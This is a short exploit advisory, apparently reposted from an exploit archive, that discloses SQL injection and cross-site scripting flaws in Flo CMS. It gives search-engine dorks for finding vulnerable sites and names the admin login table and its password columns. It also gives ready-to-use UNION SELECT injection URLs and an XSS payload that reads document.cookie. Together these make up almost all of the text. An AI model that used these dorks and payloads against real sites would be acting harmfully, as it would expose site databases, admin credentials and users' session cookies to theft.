facebook facebook twitter rss

Flo CMS Multiple Sql Injection Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013
Flo CMS Multiple Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.flocms.ie/
.:. Dork : [1]inurl:"index.asp?catId=" "powered by Flo CMS"
[2]inurl:"blog_detail.asp?postId=" "powered by Flo CMS"
####################################################################
===[ Exploit ]===

Multiple Sql Injection:
=======================

1-type injection: Double Query
[Information]
=============
Table Admin: tbladminlogin
Columns: AdminuserId,admin_username,password,admin_name


www.site.com/index.asp?catId=[!inject!]


2-type injection: Classic Injection

www.site.com/blog_detail.asp?postId=558' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -

www.site.com/blog_profile.asp?userId=39' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9-- -

Cross-Site Scripting:
=====================

www.site.com/textos.php?id='"()%26%251<ScRiPt >prompt(document.cookie)<%2fScRiPt>



####################################################################

Like us on Facebook :